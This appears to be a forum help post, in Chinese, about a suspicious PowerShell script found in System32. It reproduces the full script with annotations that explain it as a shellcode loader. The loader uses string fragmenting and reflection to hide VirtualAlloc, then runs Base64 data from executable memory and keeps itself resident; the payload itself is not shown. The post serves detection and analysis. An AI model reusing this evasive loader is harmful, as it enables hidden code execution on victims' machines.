我通过 procexp 跟踪进程的命令行参数找到了这个脚本。它位于 C:\Windows\System32\8208c741-a361-4e21-83e2-6d7f9a3b5b89.ps1 并以某种方式定期运行自己(不知道如何,我不熟悉 PS)。
脚本的最开始包含一些非常长的字符串，前面带有 `$dat +=`，可以在这个 Pastebin 中看到。
# Build a case-insensitive map "file name -> already-loaded assembly" over the
# current AppDomain. It exists only so that Get-Func below can fetch System.dll
# by name ($assemblies['System.dll']) without loading anything new.
$assemblies = New-Object -TypeName System.Collections.Generic.Dictionary'[string, System.Reflection.Assembly]' -ArgumentList ([StringComparer]::OrdinalIgnoreCase)
foreach ($assembly in ([AppDomain]::CurrentDomain.GetAssemblies())) {
# Key is just the file name of the assembly's location (e.g. 'System.dll').
$assemblies[[System.IO.Path]::GetFileName($assembly.Location)] = $assembly;
}
# Get-Ptr: wraps a raw native function pointer in a delegate type that is
# emitted at runtime, so the address can be called like a normal function.
#   $ptr     - address to call (a resolved export, or - as used later in this
#              script - a buffer the script has filled with its own bytes).
#   $params  - parameter types of the delegate's Invoke method.
#   $rettype - return type of the delegate's Invoke method.
# Returns a delegate instance bound to $ptr.
# The delegate type is produced with Reflection.Emit in a run-only dynamic
# assembly (AssemblyBuilderAccess::Run); assembly, module and type names are
# random GUIDs, so they differ on every run. This is what lets the script call
# native code without Add-Type or any P/Invoke declaration in the file.
function Get-Ptr {
param (
[IntPtr]
$ptr,
[type[]]
$params,
[type]
$rettype
)
# Dynamic assembly -> dynamic module -> public sealed class deriving from MulticastDelegate.
$bu = [AppDomain]::CurrentDomain.DefineDynamicAssembly([System.Reflection.AssemblyName]::new(('_' + [guid]::NewGuid().ToString())), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(('_' + [guid]::NewGuid().ToString()), $false).DefineType(('_' + [guid]::NewGuid().ToString()), 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]);
# Constructor and Invoke are marked Runtime/Managed: the CLR supplies their
# bodies, as it does for every delegate type.
$bu.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $params).SetImplementationFlags('Runtime, Managed');
# Invoke carries the caller-supplied signature ($rettype, $params).
$bu.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $rettype, $params).SetImplementationFlags('Runtime, Managed');
$del = $bu.CreateType();
# Bind the unmanaged address to the freshly created delegate type.
return [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ptr, $del);
}
# Get-Func: resolves an export of an already-loaded native module and returns
# it as a callable delegate (via Get-Ptr).
#   $module  - module file name handed to GetModuleHandle ('Kernel32.dll' below).
#   $name    - export name handed to GetProcAddress.
#   $params  - parameter types of the delegate.
#   $rettype - return type of the delegate.
# Instead of declaring its own P/Invoke signatures, the script reflects into
# the non-public Microsoft.Win32.UnsafeNativeMethods class inside System.dll
# and reuses the GetModuleHandle / GetProcAddress wrappers the framework
# already ships. The class name is assembled from string fragments,
# presumably so the literal 'UnsafeNativeMethods' never appears in the file;
# the same fragmenting is applied to the API name further down, and that
# pattern is itself a useful static-detection signal.
function Get-Func {
param (
[string]
$module,
[string]
$name,
[type[]]
$params,
[type]
$rettype
)
# Non-public wrapper class, fetched through the $assemblies map built at the top.
$na = $assemblies['System.dll'].GetType(('Microsoft' + '.Win32.' + 'UnsafeN' + 'ativeMethods'));
# The GetProcAddress(HandleRef, string) overload.
$gp = $na.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'));
# HMODULE of a module that is already mapped in this process (GetModuleHandle
# does not load anything).
$md = $na.GetMethod('GetModuleHandle').Invoke($null, @($module));
# GetProcAddress(hModule, name); the HandleRef merely carries the handle.
$ptr = $gp.Invoke($null, @(([System.Runtime.InteropServices.HandleRef]::new([object]::new(), $md)), $name));
return Get-Ptr $ptr $params $rettype;
}
# ---- Script body: obtain VirtualAlloc, allocate executable memory, copy the
# decoded payload into it and transfer control to it. ----
# The API name is concatenated one character at a time; the result is the
# string 'VirtualAlloc'. Splitting it like this keeps the name out of a
# plain-text scan of the file (and is a detection signal in its own right).
$fname = 'V';
$fname += 'i';
$fname += 'r';
$fname += 't';
$fname += 'u';
$fname += 'a';
$fname += 'l';
$fname += 'A';
$fname += 'l';
$fname += 'l';
$fname += 'o';
$fname += 'c';
# kernel32!VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect) -> LPVOID
$func = Get-Func 'Kernel32.dll' $fname @([IntPtr], [IntPtr], [uint32], [uint32]) ([IntPtr]);
# $dat is not defined in this listing: it is the Base64 text accumulated by
# the '$dat +=' lines at the top of the file. Decoded, it must hold at least
# 8208 + 95232 = 103440 bytes, given the two Copy calls below.
$dat = [Convert]::FromBase64String($dat);
# VirtualAlloc(NULL, 8208, 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE).
# A fresh RWX region requested from a PowerShell process is the key indicator here.
$patch = $func.Invoke(0, 8208, 12288, 64);
# First 8208 bytes of the payload -> the executable region.
[Runtime.InteropServices.Marshal]::Copy($dat, 0, $patch, 8208);
# Treat those bytes as a function (uint32, IntPtr, IntPtr, IntPtr) -> IntPtr.
$patchfunc = Get-Ptr $patch @([uint32], [IntPtr], [IntPtr], [IntPtr]) ([IntPtr]);
# Remaining 95232 bytes -> an ordinary heap buffer (no execute protection is
# requested for it) that is handed to the first stage as an argument.
$patch2 = [Runtime.InteropServices.Marshal]::AllocHGlobal(95232);
[Runtime.InteropServices.Marshal]::Copy($dat, 8208, $patch2, 95232);
# Transfer control to the copied bytes. What they do with $patch2 is not
# visible on this page; the .sys activity described in the post is a
# plausible follow-on, not something this code shows.
$patchfunc.Invoke(0, $patch2, 1, 0);
# Keep the host process alive indefinitely - presumably so whatever the
# payload started stays resident (inference; the payload itself is opaque here).
while($true)
{
Start-Sleep 10
}
运行后,它似乎以某种方式与 System32\drivers\VwA5N1xq4w 和 System32\drivers mscxjme2 下的 .sys 文件进行交互;
所有这些文件都包含一长串像这样的行:
08/23/2021 00:24:32.582 [506]: Failed to load dependency Microsoft.AnalysisServices.AdomdClient of assembly Microsoft.ReportingServices.DataExtensions, Version=2020.13.0.0, Culture=neutral, PublicKeyToken=89845dcd8080cc91 because of the following error : Die gefundene Manifestdefinition der Assembly stimmt nicht mit dem Assemblyverweis überein. (Ausnahme von HRESULT: 0x80131040
08/23/2021 00:24:32.582 [507]: Failed to load dependency Microsoft.AnalysisServices.AdomdClient of assembly Microsoft.ReportingServices.DataExtensions, Version=2020.13.0.0, Culture=neutral, PublicKeyToken=89845dcd8080cc91 because of the following error : Die gefundene Manifestdefinition der Assembly stimmt nicht mit dem Assemblyverweis überein. (Ausnahme von HRESULT: 0x80131040
该脚本将 Base64 解码后的数据复制到可执行内存并直接调用（见 VirtualAlloc 与 Marshal::Copy 那几行），这是典型的 shellcode 加载器行为；它似乎有特定目的，很可能是某个更大的系统或恶意软件的一部分。建议运行防病毒扫描。